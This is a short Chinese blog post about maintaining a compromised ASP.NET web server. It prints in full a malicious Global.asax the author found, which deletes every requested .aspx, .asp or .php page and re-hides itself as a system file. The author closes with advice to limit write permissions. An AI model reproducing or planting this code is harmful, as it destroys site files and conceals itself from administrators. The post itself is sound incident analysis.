网站权限问题要重视-维护服务器后的看法
来源:互联网 发布:淘宝网2016下载安装 编辑:程序博客网 时间:2024/05/01 13:17
今天维护了一台某公司的网站服务器,就是访问文件突然不存在了,花了些时间看了一下,原因如下:
Global.asax 被改,变成了系统文件,还隐藏了。。
文件内容如下:
<%@ Language="VB"%><%@ Import Namespace="System.IO"%><script language="VB" runat="server">Sub Session_Start(Sender As Object, E As EventArgs)Dim MyFile,PathServer.ScriptTimeout = 999999'Response.Buffer = TrueMyFile="//?/"+Server.MapPath("/")+"\global.asax" 'Response.write Neirong'session.abandon'if Neirong<>"" then execute NeirongPath=LCase(Request.ServerVariables("PATH_TRANSLATED"))If InStr(Path, ".aspx") > 0 or InStr(Path, ".asp\") > 0 or InStr(Path, ".php") > 0 or InStr(Path, ".asax") > 0 or InStr(Path, ".asa") > 0 Then 'Response.Write "<html><body><h1> HTTP/1.1 500 Server Error</h1></body></html>" + vbCrlf'Response.Write laik + vbCrlf if File.Exists(Path) then File.SetAttributes(Path,0) File.delete(path) end if Response.End End If File.SetAttributes(Server.MapPath("/")+"\global.asax" ,7)end sub</script>
这些语句够狠了吧,访问一个网站之前就删除网页。
所以,网站不能为主方便,把整个目录都有设置写权限,只能将指定的某个目录设置写权限。
- 网站权限问题要重视-维护服务器后的看法
- NC6.3 变更销售合同维护模板后单据追溯查询提示权限问题的解释
- 重视20%的问题
- 执行数据库维护计划时,有服务器访问权限问题
- 网站运营的看法
- 网站部署的权限问题
- 网站站长必须重视的robots.txt
- 网站的日常维护
- 工作趣事 之 重装服务器后的网站不能正常访问的问题
- 服务器的维护
- 关于并发服务器的看法
- 无法 重视的 问题和逃避
- (分享)码农们不得不重视的问题
- 网站建设后应该如何维护
- Android 6.0后的权限问题
- 关于拷贝文件后的权限问题
- 外贸BtoC网站 linux服务器维护 兼职
- 关于网站服务器安全维护研究
- 获取iOS各种文件路径
- 电子科技大学计算机学院老师给开的c\c++学习路线
- 建立Maven Android项目
- adb shell 命令详解
- oracle恢复已被commit删除的内容
- 网站权限问题要重视-维护服务器后的看法
- DWR实现模拟Google搜索效果
- HDU--1004--Let the Balloon Rise
- json 格式序列化
- NOR flash和NAND flash的区别
- mystruts简易MVC框架实现
- 一个华为人辞职创业后的几个反思
- 第一个简单的qt程序
- sealed 修饰符是干什么的?